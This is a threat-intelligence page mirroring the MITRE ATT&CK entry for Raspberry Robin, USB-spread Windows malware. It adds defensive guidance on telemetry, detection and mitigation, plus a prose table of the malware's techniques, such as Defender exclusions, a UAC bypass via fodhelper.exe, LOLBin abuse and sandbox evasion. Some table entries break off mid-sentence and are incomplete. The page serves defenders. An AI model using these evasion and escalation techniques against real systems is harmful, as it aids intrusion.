S1130: Raspberry Robin
Raspberry Robin is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. Raspberry Robin has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee.[1][2][3] The DLL componenet in the Raspberry Robin infection chain is also referred to as "Roshtyak."[4] The name "Raspberry Robin" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as Storm-0856 by some vendors.[5]
Analyst context for executives and security teams
Raspberry Robin matters because it turns ordinary Windows endpoint use and removable media handling into an initial-access and follow-on payload risk. The ATT&CK entry describes malware that spreads through infected USB devices with malicious LNK objects and retrieves remote payloads, with documented use as a precursor to information stealers, ransomware-enabling tooling, and other malware families. For leaders, the decision point is whether endpoint, USB, script, command-line, and web egress controls can interrupt the chain early enough to avoid a larger incident.
Executive priority
Prioritize Raspberry Robin as an operational resilience and incident-readiness scenario for Windows environments, especially where removable media is permitted or difficult to eliminate. It is useful for testing whether policy, endpoint logging, network egress monitoring, and response playbooks can connect a user-executed USB/LNK event to later behaviors such as command execution, WMI use, LOLBin proxy execution, payload download, discovery, masquerading, cleanup, and web-based command-and-control. Because MITRE provides no official detection text for this object, executives should ask for evidence of telemetry coverage and practiced response decisions rather than assurance based only on signatures.
Technical view
Validate coverage around the behaviors linked to Raspberry Robin: removable media replication and user execution, Windows command shell and WMI execution, abuse of signed Windows utilities such as msiexec.exe, odbcconf.exe, and regsvr32.exe, obfuscation and packing, process hollowing, discovery commands, file deletion or persistence cleanup, web protocol C2, web services, and ingress tool transfer. Detection engineering should correlate USB insertion or LNK execution with unusual child processes, remote payload retrieval, DLL execution paths, suspicious LOLBin parameters, and short-lived artifacts that may be deleted. IR teams should preserve removable media evidence, endpoint process trees, file system artifacts, and network destinations before cleanup reduces forensic value.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- Removable media insertion and file execution events
- LNK file creation, modification, and execution evidence
- DLL load and module execution telemetry
- WMI activity logs and endpoint management events
Detection direction
- Build correlations from removable media or LNK execution to script/command execution and outbound web traffic rather than relying on a single indicator.
- Tune LOLBin detections for context: signed Windows utilities are common, so prioritize unusual parent-child relationships, remote content access, DLL execution, and execution from removable or user-writable paths.
- Monitor for discovery activity after initial execution, including user, process, system, and file/directory enumeration, as this may indicate staging for follow-on payloads.
- Account for evasion: packing, obfuscation, masqueraded file types, masqueraded services/tasks, process hollowing, and file deletion can reduce the value of static signatures and post-event file collection.
- Review visibility gaps where web protocols and legitimate web services are broadly allowed, because this can obscure command-and-control or payload transfer in normal traffic.
Mitigation priorities
- Reduce removable media risk first: restrict or control USB execution where business permits and ensure exceptions are documented and monitored.
- Harden Windows execution paths by limiting unnecessary script, command shell, WMI, and signed utility abuse through policy and application control where feasible.
- Improve egress control and monitoring for endpoints so remote payload retrieval and web-service-based communications are not treated as unmanaged background noise.
- Ensure endpoint protection and logging preserve process lineage, command lines, file events, and network context long enough for investigation.
- Prepare IR playbooks for USB/LNK-originated infection chains, including evidence collection from the host, removable device, and network logs before artifact cleanup occurs.
Analyst notes and limits
The supplied ATT&CK object identifies Raspberry Robin as Windows initial-access malware active through early 2024 and notable for infected USB devices containing malicious LNK objects that retrieve remote hosted payloads. Relationship context expands the defensive focus to execution, stealth, discovery, command-and-control, ingress transfer, and removable media replication techniques. The object also notes that Raspberry Robin has been used as a precursor to other payloads, which makes early containment and evidence preservation more important than malware-family naming alone.
MITRE does not provide an official detection section for this object, and the supplied tactics field is not specified for the malware object itself. This take therefore uses the official description, external references list, platform field, and stated technique relationships only. Local conclusions about exposure, active intrusion, control effectiveness, or detection coverage require environment-specific telemetry and validation.
Raspberry Robin
Raspberry Robin is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. Raspberry Robin has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee.[1][2][3] The DLL componenet in the Raspberry Robin infection chain is also referred to as "Roshtyak."[4] The name "Raspberry Robin" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as Storm-0856 by some vendors.[5]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Raspberry Robin attempts to identify security software running on the victim machine, such as BitDefender, Avast, and Kaspersky.CitationTrendMicro RaspberryRobin 2022CitationHP RaspberryRobin 2024 |
| Enterprise | T1685 | Disable or Modify Tools | Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection.CitationHP RaspberryRobin 2024 |
| Enterprise | T1082 | System Information Discovery | Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature.CitationHP RaspberryRobin 2024 |
| Enterprise | T1027.002 | Software Packing Sub-technique | Raspberry Robin contains multiple payloads that are packed for defense evasion purposes and unpacked on runtime.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1102 | Web Service | Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers.CitationHP RaspberryRobin 2024 |
| Enterprise | T1480 | Execution Guardrails | Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified.CitationTrendMicro RaspberryRobin 2022 Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script.CitationHP RaspberryRobin 2024 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key such as: |
| Enterprise | T1559 | Inter-Process Communication | Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1571 | Non-Standard Port | Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Raspberry Robin will execute its payload prior to initializing command and control traffic by impersonating one of several legitimate program names such as dllhost.exe, regsvr32.exe, or rundll32.exe.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1033 | System Owner/User Discovery | Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to determine if it is running in Session 0, indicating running with elevated privileges.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1105 | Ingress Tool Transfer | Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's |
| Enterprise | T1574 | Hijack Execution Flow | Raspberry Robin will drop a copy of itself to a subfolder in |
| Enterprise | T1036.008 | Masquerade File Type Sub-technique | Raspberry Robin has historically been delivered via infected USB drives containing a malicious LNK object masquerading as a legitimate folder.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1091 | Replication Through Removable Media | Raspberry Robin has historically used infected USB media to spread to new victims.CitationTrendMicro RaspberryRobin 2022CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.CitationRedCanary RaspberryRobin 2022 Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.CitationHP RaspberryRobin 2024 |
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Raspberry Robin will execute a legitimate process, then suspend it to inject code for a Tor client into the process, followed by resumption of the process to enable Tor client execution.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1583.001 | Domains Sub-technique | Raspberry Robin uses newly-registered domains containing only a few characters for command and controll purposes, such as " |
| Enterprise | T1574.001 | DLL Sub-technique | Raspberry Robin can use legitimate, signed EXE files paired with malicious DLL files to load and run malicious payloads while bypassing defenses.CitationHP RaspberryRobin 2024 |
| Enterprise | T1057 | Process Discovery | Raspberry Robin can identify processes running on the victim machine, such as security software, during execution.CitationTrendMicro RaspberryRobin 2022CitationHP RaspberryRobin 2024 |
| Enterprise | T1047 | Windows Management Instrumentation | Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer (MSI) package.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1559.001 | Component Object Model Sub-technique | Raspberry Robin creates an elevated COM object for |
| Enterprise | T1083 | File and Directory Discovery | Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check.CitationHP RaspberryRobin 2024 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Raspberry Robin uses cmd.exe to read and execute a file stored on an infected USB device as part of initial installation.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1218.008 | Odbcconf Sub-technique | Raspberry Robin uses the Windows utility odbcconf.exe to execute malicious commands, using the |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1548 | Abuse Elevation Control Mechanism | Raspberry Robin implements a variation of the |
| Enterprise | T1204 | User Execution | Raspberry Robin execution can rely on users directly interacting with malicious LNK files.CitationMicrosoft RaspberryRobin 2022 |
| Enterprise | T1622 | Debugger Evasion | Raspberry Robin leverages anti-debugging mechanisms through the use of |
| Enterprise | T1583.008 | Malvertising Sub-technique | Raspberry Robin variants have been delivered via malicious advertising items that, when interacted with, download a malicious archive file containing the initial payload, hosted on services such as Discord.CitationHP RaspberryRobin 2024 |
| Enterprise | T1070.004 | File Deletion Sub-technique | Raspberry Robin can delete its initial delivery script from disk during execution.CitationHP RaspberryRobin 2024 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1497.001 | System Checks Sub-technique | Raspberry Robin performs a variety of system environment checks to determine if it is running in a virtualized or sandboxed environment, such as querying CPU temperature information and network card MAC address information.CitationHP RaspberryRobin 2024 |
| Enterprise | T1070.009 | Clear Persistence Sub-technique | Raspberry Robin uses a |
| Enterprise | T1071 | Application Layer Protocol | Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.CitationRedCanary RaspberryRobin 2022CitationTrendMicro RaspberryRobin 2022CitationHP RaspberryRobin 2024 |
| Enterprise | T1548.002 | Bypass User Account Control Sub-technique | Raspberry Robin will use the legitimate Windows utility fodhelper.exe to run processes at elevated privileges without requiring a User Account Control prompt.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1027 | Obfuscated Files or Information | Raspberry Robin uses mixed-case letters for filenames and commands to evade detection.CitationRedCanary RaspberryRobin 2022 |
| Enterprise | T1218.007 | Msiexec Sub-technique | Raspberry Robin uses msiexec.exe for post-installation communication to command and control infrastructure.CitationRedCanary RaspberryRobin 2022 Msiexec.exe is executed referencing a remote resource for second-stage payload retrieval and execution.CitationTrendMicro RaspberryRobin 2022 |
| Enterprise | T1059 | Command and Scripting Interpreter | Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution.CitationHP RaspberryRobin 2024 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | e206131517da… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
TrendMicro RaspberryRobin 2022
Christopher So. (2022, December 20). Raspberry Robin Malware Targets Telecom, Governments. Retrieved May 17, 2024.
Open source URL -
[2]
RedCanary RaspberryRobin 2022
Lauren Podber and Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 17, 2024.
Open source URL -
[3]
HP RaspberryRobin 2024
Patrick Schläpfer . (2024, April 10). Raspberry Robin Now Spreading Through Windows Script Files. Retrieved May 17, 2024.
Open source URL -
[4]
Avast RaspberryRobin 2022
Jan Vojtěšek. (2022, September 22). Raspberry Robin’s Roshtyak: A Little Lesson in Trickery. Retrieved May 17, 2024.
Open source URL -
[5]
Microsoft RaspberryRobin 2022
Microsoft Threat Intelligence. (2022, October 27). Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity. Retrieved May 17, 2024.
Open source URL -
[6]
mitre-attack S1130Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.